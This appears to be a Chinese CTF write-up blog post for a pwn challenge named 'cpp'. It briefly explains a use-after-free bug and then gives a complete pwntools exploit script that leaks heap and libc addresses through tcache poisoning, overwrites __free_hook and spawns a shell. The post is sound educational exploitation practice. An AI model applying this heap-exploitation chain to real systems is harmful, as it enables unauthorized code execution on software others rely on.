[Pwn] cpp - cpt.shao xp0int Posted on Apr 29 2021 简单UAF题目,本质还是菜单题,只是CPP的逆向有点难看。分析清楚逻辑就能发现1选项删除chunk之后还能写入一个指针。直接tcache posion就可以了。 因为需要泄露libc地址所以可以先泄露heap地址然后进行一次tcache posion来改写heap上面的一个chunk size,把0x21改成0x421;当然这样做之前要分配好一堆chunk来占位。 泄露完libc地址再tcache posion打freehook就可以了。 ```py # flag{U5e_uN1qu3_p7R_C0r3Ct1Y_P1s} from pwn import * import re context.terminal = ['tmux', 'splitw', '-h'] context.arch = 'amd64' context.log_level = "debug" env = {'LD_PRELOAD': ''} if len(sys.argv) == 1: p = process('./chall') elif len(sys.argv) == 3: p = remote(sys.argv[1], sys.argv[2]) se = lambda data :p.send(data) sa = lambda delim,data :p.sendafter(delim, data) sl = lambda data :p.sendline(data) sla = lambda delim,data :p.sendlineafter(delim, data) sea = lambda delim,data :p.sendafter(delim, data) rc = lambda numb=4096 :p.recv(numb) ru = lambda delims, drop=True :p.recvuntil(delims, drop) uu32 = lambda data :u32(data.ljust(4, '\0')) uu64 = lambda data :u64(data.ljust(8, '\0')) info_addr = lambda tag, addr :p.info(tag + ': {:#x}'.format(addr)) def add(content, idx): sla("> ", "0") sea("> ", content) sla("> ", str(idx)) def puts(idx, content): sla("> ", "1") sla("> ", str(idx)) leak = ru("\n> ") se(content) return leak # gdb.attach(p, gdbcmd) add("A"*7, 0) add("B"*7, 1) puts(0, "C"*7) leak = puts(1, "D"*7) leak = uu64(leak) info_addr("leak", leak) add("C"*7, 0) puts(0, p64(leak)[:7]) add("D"*7, 0) add("D"*7, 1) for i in range(2, 0x32): add("F"*7, i) puts(2, p64(leak)[:7]) puts(0, p64(leak)[:7]) puts(1, p64(leak)[:7]) add(p64(leak+0x58)[:7], 0) add("B"*7, 1) add(p64(0x421)[:7], 2) leak_libc = puts(3, "E"*7) leak_libc = uu64(leak_libc) info_addr("leak", leak_libc) libc = leak_libc - 0x1ebbe0 info_addr("libc", libc) puts(7, p64(leak)[:7]) puts(6, p64(leak)[:7]) puts(0, p64(leak)[:7]) add(p64(libc + 0x1eeb28)[:7], 0) add("/bin/sh", 6) add(p64(libc+0x55410)[:7], 7) sla("> ", "1") sla("> ", str(0)) p.interactive() ``` 打赏还是打残,这是个问题 赏 Wechat Pay Alipay [Pwn] pwn1 - cpt.shao [Reverse] PE - Cew
没有帐号? 立即注册